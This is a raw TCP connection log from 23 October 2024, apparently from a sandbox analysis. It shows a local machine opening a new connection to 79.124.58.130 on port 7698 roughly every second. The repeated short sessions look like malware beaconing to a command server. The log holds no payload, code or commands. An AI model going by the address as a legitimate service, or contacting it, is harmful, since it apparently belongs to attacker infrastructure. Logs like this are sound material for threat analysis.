Oct 23, 2024 17:28:51.888997078 CEST	7698	49895	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:51.889136076 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.004817963 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.006175995 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.012139082 CEST	7698	49895	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:52.012218952 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.013263941 CEST	7698	49896	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:52.013370037 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.014244080 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:52.020858049 CEST	7698	49896	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:52.896178007 CEST	7698	49896	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:52.896266937 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.004686117 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.005067110 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.010474920 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:53.010626078 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.010730028 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.011221886 CEST	7698	49896	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:53.011276960 CEST	49896	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:53.016107082 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.102485895 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.102550030 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.102615118 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.102631092 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.102672100 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.208445072 CEST	49897	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.209355116 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.214368105 CEST	7698	49897	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.214899063 CEST	7698	49898	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:54.215054989 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.215193987 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:54.220741034 CEST	7698	49898	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:55.106300116 CEST	7698	49898	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:55.106381893 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.223201990 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.223614931 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.229006052 CEST	7698	49899	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:55.229078054 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.229099035 CEST	7698	49898	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:55.229151011 CEST	49898	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.229521990 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:55.234900951 CEST	7698	49899	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:56.126435995 CEST	7698	49899	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:56.127618074 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.239710093 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.239713907 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.246344090 CEST	7698	49900	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:56.246753931 CEST	7698	49899	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:56.246859074 CEST	49899	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.246859074 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.247024059 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:56.253427029 CEST	7698	49900	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:57.139472008 CEST	7698	49900	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:57.139538050 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.256174088 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.256613016 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.262026072 CEST	7698	49901	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:57.262103081 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.262218952 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.262425900 CEST	7698	49900	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:57.262484074 CEST	49900	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:57.267595053 CEST	7698	49901	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:58.149750948 CEST	7698	49901	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:58.154534101 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.272449017 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.272923946 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.415082932 CEST	7698	49901	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:58.415241957 CEST	49901	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.417077065 CEST	7698	49901	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:58.417120934 CEST	7698	49902	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:58.417196989 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.417469978 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:58.423681021 CEST	7698	49902	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:59.316545963 CEST	7698	49902	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:59.323596954 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.426454067 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.426462889 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.432126045 CEST	7698	49903	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:59.435686111 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.435686111 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.438637018 CEST	7698	49902	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:59.439513922 CEST	49902	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:59.443432093 CEST	7698	49903	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:00.339968920 CEST	7698	49903	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:00.340039968 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.458199024 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.458638906 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.464416981 CEST	7698	49904	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:00.464478970 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.464637041 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.464955091 CEST	7698	49903	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:00.465008974 CEST	49903	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:00.470004082 CEST	7698	49904	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:01.345444918 CEST	7698	49904	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:01.345626116 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.458544016 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.458703041 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.464127064 CEST	7698	49905	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:01.464401007 CEST	7698	49904	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:01.467641115 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.467852116 CEST	49904	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.470532894 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:01.476329088 CEST	7698	49905	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:02.372503996 CEST	7698	49905	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:02.372581005 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.519754887 CEST	7698	49905	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:02.519828081 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.829849005 CEST	49905	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.835546017 CEST	7698	49905	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:02.950623035 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.956254005 CEST	7698	49906	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:02.956324100 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.956877947 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:02.962213993 CEST	7698	49906	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:03.849368095 CEST	7698	49906	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:03.849528074 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.958064079 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.958237886 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.964529037 CEST	7698	49907	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:03.964617968 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.964788914 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.964966059 CEST	7698	49906	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:03.965204000 CEST	49906	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:03.970063925 CEST	7698	49907	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:04.869337082 CEST	7698	49907	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:04.869406939 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.976433992 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.977066040 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.982568026 CEST	7698	49907	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:04.982589960 CEST	7698	49908	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:04.982634068 CEST	49907	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.982670069 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.988423109 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:04.993829012 CEST	7698	49908	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:05.875765085 CEST	7698	49908	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:05.875869989 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:05.989213943 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:05.989612103 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:05.995018005 CEST	7698	49909	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:05.995445013 CEST	7698	49908	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:05.999622107 CEST	49908	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:05.999624014 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:05.999746084 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:06.005141973 CEST	7698	49909	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:06.902873993 CEST	7698	49909	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:06.902956963 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.020783901 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.021137953 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.026936054 CEST	7698	49909	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:07.026976109 CEST	49909	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.027472973 CEST	7698	49910	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:07.027534008 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.027719021 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:07.033452988 CEST	7698	49910	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:07.917001009 CEST	7698	49910	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:07.921684980 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.062927961 CEST	7698	49910	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:08.066513062 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.132915020 CEST	49910	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.133511066 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.138477087 CEST	7698	49910	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:08.138992071 CEST	7698	49911	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:08.139576912 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.139954090 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:08.145385027 CEST	7698	49911	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:09.033371925 CEST	7698	49911	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:09.033438921 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.146394968 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.146787882 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.152342081 CEST	7698	49912	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:09.152409077 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.152896881 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.152962923 CEST	7698	49911	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:09.153172970 CEST	49911	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:09.158200979 CEST	7698	49912	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:10.051497936 CEST	7698	49912	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:10.055694103 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.161341906 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.161344051 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.166857958 CEST	7698	49913	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:10.167207003 CEST	7698	49912	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:10.167548895 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.167548895 CEST	49912	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.167777061 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:10.173029900 CEST	7698	49913	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:11.045738935 CEST	7698	49913	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:11.045829058 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.167757034 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.168098927 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.173633099 CEST	7698	49913	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:11.173682928 CEST	49913	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.174005032 CEST	7698	49914	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:11.174093962 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.174258947 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:11.179924011 CEST	7698	49914	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:12.084821939 CEST	7698	49914	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:12.086128950 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.200485945 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.201570988 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.206578016 CEST	7698	49914	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:12.206980944 CEST	7698	49915	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:12.207122087 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.207123995 CEST	49914	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.207364082 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:12.212738037 CEST	7698	49915	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:13.097579002 CEST	7698	49915	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:13.097712994 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.241430998 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.241837025 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.242578983 CEST	7698	49915	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:13.242635012 CEST	49915	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.247020006 CEST	7698	49915	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:13.247387886 CEST	7698	49916	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:13.247481108 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.247759104 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:13.253159046 CEST	7698	49916	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:14.133976936 CEST	7698	49916	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:14.134290934 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.239301920 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.239310026 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.244875908 CEST	7698	49917	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:14.245263100 CEST	7698	49916	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:14.245431900 CEST	49916	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.245434046 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.245590925 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:14.250902891 CEST	7698	49917	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:15.143393040 CEST	7698	49917	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:15.143501997 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.278599024 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.279025078 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.284648895 CEST	7698	49917	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:15.284790039 CEST	49917	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.284816027 CEST	7698	49918	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:15.284882069 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.285026073 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:15.290445089 CEST	7698	49918	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:16.176999092 CEST	7698	49918	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:16.179585934 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.286295891 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.287504911 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.292063951 CEST	7698	49918	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:16.292162895 CEST	49918	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.292880058 CEST	7698	49919	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:16.293049097 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.293394089 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:16.298748970 CEST	7698	49919	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:17.203134060 CEST	7698	49919	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:17.203212023 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.317176104 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.317183971 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.322694063 CEST	7698	49920	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:17.322982073 CEST	7698	49919	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:17.323555946 CEST	49919	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.323564053 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.327486992 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:17.332936049 CEST	7698	49920	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:18.218683958 CEST	7698	49920	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:18.222578049 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.364470005 CEST	7698	49920	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:18.364528894 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.614703894 CEST	49920	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.615197897 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.620160103 CEST	7698	49920	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:18.620557070 CEST	7698	49921	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:18.620634079 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.623471022 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:18.628901005 CEST	7698	49921	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:19.506824017 CEST	7698	49921	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:19.507642984 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.622844934 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.623131037 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.628457069 CEST	7698	49922	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:19.628561020 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.628685951 CEST	7698	49921	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:19.629023075 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.629134893 CEST	49921	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:19.634512901 CEST	7698	49922	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:20.524063110 CEST	7698	49922	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:20.524137974 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.652635098 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.652996063 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.658505917 CEST	7698	49923	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:20.658596992 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.658714056 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.659156084 CEST	7698	49922	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:20.659209967 CEST	49922	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:20.664246082 CEST	7698	49923	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:21.557081938 CEST	7698	49923	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:21.558015108 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.661048889 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.661500931 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.666848898 CEST	7698	49923	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:21.666985035 CEST	49923	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.667459011 CEST	7698	49924	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:21.667613983 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.667927980 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:21.673332930 CEST	7698	49924	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:22.572153091 CEST	7698	49924	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:22.572218895 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.681312084 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.681862116 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.687041998 CEST	7698	49924	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:22.687079906 CEST	49924	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.687212944 CEST	7698	49925	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:22.687272072 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.687478065 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:22.692739964 CEST	7698	49925	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:23.584584951 CEST	7698	49925	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:23.584747076 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.693687916 CEST	49926	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.693698883 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.699290037 CEST	7698	49926	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:23.699454069 CEST	49926	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.700042009 CEST	7698	49925	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:23.700072050 CEST	49926	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.700115919 CEST	49925	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:23.705439091 CEST	7698	49926	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:24.592324972 CEST	7698	49926	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:24.592453003 CEST	49926	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:24.709193945 CEST	49926	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:24.709697962 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:24.715080023 CEST	7698	49927	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:24.715153933 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:24.715384960 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:24.715390921 CEST	7698	49926	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:24.715432882 CEST	49926	7698	192.168.2.8	79.124.58.130
